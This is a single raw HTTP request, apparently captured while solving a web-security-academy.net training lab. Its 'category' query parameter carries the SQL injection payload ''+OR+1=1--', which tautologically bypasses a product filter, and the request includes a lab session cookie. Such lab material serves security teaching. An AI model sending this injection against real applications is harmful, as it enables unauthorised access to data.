GET /filter?category='+OR+1=1-- HTTP/1.1
Host: ac1e1f841e9537e9804f510a00f3003b.web-security-academy.net
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac1e1f841e9537e9804f510a00f3003b.web-security-academy.net/filter?category=Lifestyle
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=LN2lOxG6Cwe3CoFCvQkSiF4QPVAc18Gy